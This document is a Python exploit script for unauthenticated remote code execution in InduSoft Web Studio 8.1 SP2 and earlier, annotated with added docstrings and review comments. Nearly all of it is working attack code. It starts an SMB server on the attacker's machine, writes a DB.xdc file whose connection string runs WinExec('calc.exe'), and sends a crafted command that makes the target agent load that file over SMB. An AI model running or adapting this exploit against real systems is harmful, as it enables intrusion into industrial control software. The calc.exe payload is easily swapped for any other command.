
##
# Exploit Title: Indusoft Web Studio Unauthenticated RCE
# Date: 02/04/2019
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.indusoft.com/
# Software: http://www.indusoft.com/Products-Downloads/Download-Library
# Version: 8.1 SP2 and below
# Tested on: Windows 7 running the Web Studio 8.1 SP2 demo app
# CVE: CVE-2019-6545 CVE-2019-6543
# Advisory: https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec133.pdf?hsLang=en
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-19-036-01
# Advisory: https://www.tenable.com/security/research/tra-2019-04
#
# Requirements: Python 2 (str is used as the raw byte buffer throughout),
# impacket (provides the SMB server), and the ability to bind TCP/445 on
# the --lip address. The SMB share exports the current working directory,
# so run this from an empty scratch directory.
##
|
|
import argparse
import os
import socket
import sys
import threading
import time
from struct import *

from impacket import smbserver
|
|
|
|
##
# The SMB Server function. Runs on its own thread.
# NOTE: the exported share is rooted at the current working directory, so
# every file in cwd is readable by any client that can reach TCP/445 on lip.
# @param lip the listening IP address
##
|
|
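def smb_server(lip, share_name='LOLWAT', share_path='.'):
    """Serve an impacket SimpleSMBServer on ``lip``:445 for the target to fetch from.

    Meant to be run on its own thread; the caller marks that thread as a
    daemon, so the server disappears when the main thread exits.

    Args:
        lip: IPv4 address to listen on.  The target must be able to reach
            this address on TCP/445 (port 445 must be free and bindable,
            which normally needs root).
        share_name: name of the exported share.  The caller builds the UNC
            path ``\\\\<lip>\\<share_name>\\DB`` from the same literal, so
            keep the two in sync if you change it.
        share_path: directory exported as the share root.  Defaults to the
            current working directory, which is also where the caller writes
            ``DB.xdc``.

    Security notes:
        * Everything under ``share_path`` is readable by any client that can
          reach the port -- run from an empty scratch directory.
        * The share is added with an empty third argument and the SMB
          challenge is set to ``''``; presumably this lets the agent read
          the file without credentials -- confirm against the installed
          impacket version if the fetch fails.
        * Logging is discarded (``os.devnull``); point ``setLogFile`` at a
          real path when debugging why the agent never connects.
    """
    server = smbserver.SimpleSMBServer(listenAddress=lip, listenPort=445)
    server.addShare(share_name, share_path, '')
    server.setSMBChallenge('')
    # os.devnull is '/dev/null' on Unix, so this matches the original there
    # and also works on Windows hosts.
    server.setLogFile(os.devnull)
    # Serves requests for the lifetime of the thread (does not return
    # on its own -- TODO confirm for the impacket version in use).
    server.start()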
|
|
|
|
##
# Converts a normal string to a UTF-16LE string with a length field.
# The length field counts characters (len(s)), not encoded bytes.
# @param s the string to convert
##
|
|
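def wstr(s):
    """Encode ``s`` as a length-prefixed UTF-16LE field for the agent protocol.

    Layout, as this PoC produces it:
        ``FF FE FF`` marker, then a length field sized by the *character*
        count ``len(s)`` (not the encoded byte count -- TODO confirm against
        the agent's parser):
          * ``< 0xff``    -> one byte ``<B``
          * ``< 0xffff``  -> ``FF`` + two bytes ``<H``
          * otherwise     -> ``FF FF FF`` + four bytes ``<L``
        followed by the UTF-16LE bytes of ``s``.

    Args:
        s: text to encode.  Under Python 2 a ``str`` is implicitly decoded
           as ASCII before encoding, so non-ASCII ``str`` input raises
           ``UnicodeDecodeError``; pass ``unicode`` for such input.

    Returns:
        The encoded field (``str`` under Python 2, ``bytes`` under
        Python 3).  Byte literals are used for the fixed parts so the
        result is unchanged on Python 2 while the function also works on
        Python 3, where the original ``str`` + ``bytes`` mix raised
        ``TypeError``.
    """
    count = len(s)
    encoded = s.encode('utf_16_le')

    if count < 0xff:
        length = pack('<B', count)
    elif count < 0xffff:
        length = b'\xff' + pack('<H', count)
    else:
        length = b'\xff\xff\xff' + pack('<L', count)

    return b'\xff\xfe\xff' + length + encoded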
|
|
|
|
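if __name__ == '__main__':

    # Written for Python 2: ``str`` is used as the raw byte buffer for the
    # socket traffic and for the wstr() output, and ``'<- ' + resp`` relies
    # on that.  print(...) with a single argument is valid on both
    # interpreters, so that form is used throughout.
    top_parser = argparse.ArgumentParser(description='test')
    top_parser.add_argument('--cip', action="store", dest="cip",
                            required=True, help="The IPv4 address to connect to")
    # argparse applies ``type`` to string defaults too, so the original
    # default="1234" and this int are equivalent; the int is just clearer.
    top_parser.add_argument('--cport', action="store", dest="cport",
                            type=int, help="The port to connect to", default=1234)
    top_parser.add_argument('--lip', action="store", dest="lip",
                            required=True, help="The address to connect back to")
    args = top_parser.parse_args()

    # Connect to the remote agent (same order as the original: the target is
    # contacted before port 445 is bound or anything is written to disk).
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("[+] Attempting connection to " + args.cip + ":" + str(args.cport))
    # The timeout also bounds every recv() below; a timeout raises and is
    # not caught, so the traceback is the failure signal in that case.
    sock.settimeout(15)
    sock.connect((args.cip, args.cport))
    print("[+] Connected!")

    try:
        # Spin up the SMB server thread.  It is a daemon thread, so it is
        # torn down as soon as the main thread exits.  The share is rooted
        # at the current working directory (see smb_server), so run this
        # from an empty scratch directory: anything else in cwd is served to
        # any client that can reach --lip on TCP/445.
        print("[+] Spinning up the SMB Server")
        smb_thread = threading.Thread(target=smb_server, args=(args.lip, ))
        smb_thread.daemon = True
        smb_thread.start()

        # Drop the xdc file into cwd, i.e. the root of the share above.
        # The ConnectionString is the part the agent evaluates; the
        # WinExec("calc.exe") marker is a harmless proof of execution.
        print("[+] Creating the DB.xdc file")
        with open("./DB.xdc", "w") as xdc:
            xdc.write(
                "<?xml version=\"1.0\"?>\n"
                "<Connection>\n"
                "\t<ConnectionString>{WinExec(\"calc.exe\")}</ConnectionString>\n"
                "\t<User></User>\n"
                "\t<TimeOut>2</TimeOut>\n"
                "\t<LongTimeOut>5</LongTimeOut>\n"
                "\t<HostName>127.0.0.1</HostName>\n"
                # no newline after TCPPort in the original; kept as-is, the
                # elements are still separated by whitespace
                "\t<TCPPort>3997</TCPPort>"
                "\t<Flags>0</Flags>\n"
                "\t<RetryInterval>120</RetryInterval>\n"
                "</Connection>\n")

        print("[+] Sending the connection init message")
        init_conn = "\x02\x31\x10\x31\x10\x38\x10\x31\x10\x31\x03"
        sock.sendall(init_conn)
        resp = sock.recv(1024)
        print('<- ' + resp)

        # Basic validation only: a single recv() may return a partial
        # message, and all that is checked is the trailing 0x03 terminator.
        if resp and resp.endswith('\x03'):
            print("[+] Received an init response")
        else:
            # Exit non-zero so a wrapper can tell this apart from success
            # (the original exited 0 here).
            print("[-] Invalid init response. Exiting...")
            sys.exit(1)

        # Craft command 66 (0x42): five length-prefixed UTF-16LE strings
        # followed by three little-endian dwords, framed by 0x02 ... 0x03.
        cmd = wstr('CO')  # options: EX, CO, CF, CC
        # UNC path of the file the agent loads.  The share name must match
        # the one smb_server() exports; the agent presumably appends ".xdc"
        # to "DB", which is why DB.xdc was written above -- TODO confirm.
        cmd += wstr('\\\\' + args.lip + '\\LOLWAT\\DB')
        cmd += wstr('')
        cmd += wstr('')
        cmd += wstr('')
        cmd += wstr('lolwat')
        # Trailing integer fields; their meaning is not documented in this PoC.
        cmd += pack('<L', 0x3e80)
        cmd += pack('<L', 0)
        cmd += pack('<L', 100)
        cmd = '\x02\x42' + cmd + '\x03'

        # Send it to the agent
        print("[+] Sending command 66")
        sock.sendall(cmd)

        print("[+] Grabbing the command response")
        resp = sock.recv(1024)
        print('<- ' + resp)

        # This error text is the success signal: presumably the agent only
        # complains about the ConnectionString after it has fetched DB.xdc
        # over SMB.  If the target cannot reach --lip on TCP/445 (egress
        # filtering, another service already on 445) you land in the else
        # branch instead.
        expected = ("Format of the initialization string does not conform to "
                    "specification starting at index 0").encode('utf_16_le')
        if expected in resp:
            print('[+] Success! We received the expected error message.')
        else:
            print('[-] Unexpected error message. Something went wrong.')

        print('[+] Disconnecting')
    finally:
        # Close on every path, including the sys.exit(1) above and any
        # socket.timeout raised by recv().
        sock.close()

    print('[+] Wait while the agent disconnects from the SMB server...')
    # NOTE(review): sys.exit() does not wait for daemon threads, so the SMB
    # server is torn down right here despite the message above.  If the
    # agent still needs the share at this point, a time.sleep() (time is
    # imported but unused) before exiting would keep it alive -- TODO confirm.
    sys.exit(0)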